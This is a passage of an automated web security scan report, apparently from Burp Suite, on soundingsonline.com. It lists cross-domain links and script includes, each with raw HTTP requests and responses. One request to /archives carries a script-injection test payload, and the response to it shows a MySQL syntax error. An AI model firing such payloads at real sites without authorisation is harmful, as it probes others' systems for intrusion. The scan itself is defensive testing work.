</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

4.4. http://www.soundingsonline.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_chronocontact&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<p align="center"><img src="http://www.soundingspub.com/images/cgaux_graphics/cgaux.gif" width="150" border="0" height="150" /></a>
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=58g&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"> <img src="/images/cgaux_graphics/SND.Jul.09.jpg" width="100" border="0" height="135" />
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S"><img src="/images/cgaux_graphics/trade_1008_cover_100p.jpg" width="100" border="0" height="135" />
...[SNIP]...
<div class="chronoform">
<a href="http://www.chronoengine.com">Joomla Professional Work</a>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

5. Cross-domain script include  previous  next
There are 48 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www.soundingsonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=tuebuqj09e756i1v904bm8i7l6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.2. http://www.soundingsonline.com/about-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.3. http://www.soundingsonline.com/advertise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /advertise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:30:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.4. http://www.soundingsonline.com/archives  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:27:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:27:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.5. http://www.soundingsonline.com/boat-shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /boat-shop HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.6. http://www.soundingsonline.com/boat-shop/know-how  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /boat-shop/know-how HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.7. http://www.soundingsonline.com/boat-shop/new-boats  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /boat-shop/new-boats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.8. http://www.soundingsonline.com/boat-shop/new-gear  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /boat-shop/new-gear HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.9. http://www.soundingsonline.com/boat-shop/on-powerboats  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /boat-shop/on-powerboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.10. http://www.soundingsonline.com/boat-shop/on-sailboats  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /boat-shop/on-sailboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.11. http://www.soundingsonline.com/boat-shop/q-a-a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /boat-shop/q-a-a HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.12. http://www.soundingsonline.com/boat-shop/sea-savvy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /boat-shop/sea-savvy HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.13. http://www.soundingsonline.com/boat-shop/tech-talk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /boat-shop/tech-talk HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.14. http://www.soundingsonline.com/boat-shop/used-boat-review  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /boat-shop/used-boat-review HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
